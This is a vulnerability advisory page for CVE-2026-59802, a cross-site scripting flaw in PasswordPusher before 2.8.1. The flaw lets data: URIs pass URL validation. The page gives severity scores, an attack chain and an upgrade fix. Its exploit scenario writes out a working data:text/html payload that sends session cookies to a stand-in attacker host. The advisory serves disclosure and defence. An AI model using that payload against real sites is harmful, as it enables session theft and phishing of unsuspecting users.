Skip to main content

PasswordPusher EUVDEUVD-2026-42371

| CVE-2026-59802 MEDIUM
Permissive List of Allowed Inputs (CWE-183)
2026-07-08 VulnCheck
6.3
CVSS 4.0 · Vendor: VulnCheck
Share

Severity by source

Vendor (VulnCheck) PRIMARY
6.3 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
8.2 HIGH

Network-delivered, no auth required (PR:N), scope change to victim browser (S:C), high confidentiality risk from credential theft, low integrity for page content manipulation.

3.1 AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:L/SA:N

Primary rating from Vendor (VulnCheck).

CVSS VectorVendor: VulnCheck

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
P
Scope
X

Lifecycle Timeline

2
Patch available
Jul 08, 2026 - 21:04 EUVD
Analysis Generated
Jul 08, 2026 - 20:50 vuln.today

DescriptionCVE.org

PasswordPusher before 2.8.1 accepts data URI schemes in URL push payloads due to insufficient validation in the valid_url function. Attackers can create malicious pushes containing data:text/html URIs that execute arbitrary JavaScript in victims' browsers when clicked, enabling phishing and credential theft under the trusted PasswordPusher domain.

AnalysisAI

Cross-site scripting via data URI injection in PasswordPusher before 2.8.1 allows unauthenticated attackers to create URL pushes containing data:text/html payloads that execute arbitrary JavaScript in victims' browsers under the trusted PasswordPusher origin. The root cause is the valid_url function accepting data: URI schemes as valid URLs, meaning any attacker with push creation access can craft a link that, when clicked by a recipient, renders attacker-controlled HTML and JavaScript within the trusted application domain - enabling convincing phishing pages or session cookie harvesting. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Craft data:text/html URI with embedded JS
Delivery
Submit as URL push payload (no auth required)
Exploit
Share push link with target via email or chat
Install
Victim clicks link expecting a password
C2
Browser renders data URI as HTML under PasswordPusher origin
Execute
Embedded JavaScript executes in trusted domain context
Impact
Harvest credentials or session tokens

Vulnerability AssessmentAI

Exploitation No authentication is required to create a URL push in PasswordPusher (PR:N in the CVSS 4.0 vector), so any external attacker can generate a malicious push link without an account. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 4.0 vector (AV:N/AC:L/AT:N/PR:N/UI:P/SC:H/SI:L) scores 6.3, reflecting network-accessible exploitation with no authentication required and no attack complexity, but requiring a single victim interaction (UI:P - link click). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An external attacker with no account creates a PasswordPusher URL push with a payload of data:text/html,<html><body><script>document.location='https://attacker.example/steal?c='+document.cookie</script></body></html> and shares the resulting push link via email to a corporate helpdesk team that routinely receives credential-sharing links from PasswordPusher. A helpdesk agent clicks the link expecting a password, the browser renders the data URI as HTML within the PasswordPusher origin, and the embedded JavaScript exfiltrates the agent's session cookies to the attacker's server. …
Remediation The primary remediation is upgrading to PasswordPusher 2.8.1 or later, which introduces proper rejection of data: URI schemes in the valid_url validation function. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

EUVD-2026-42371 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy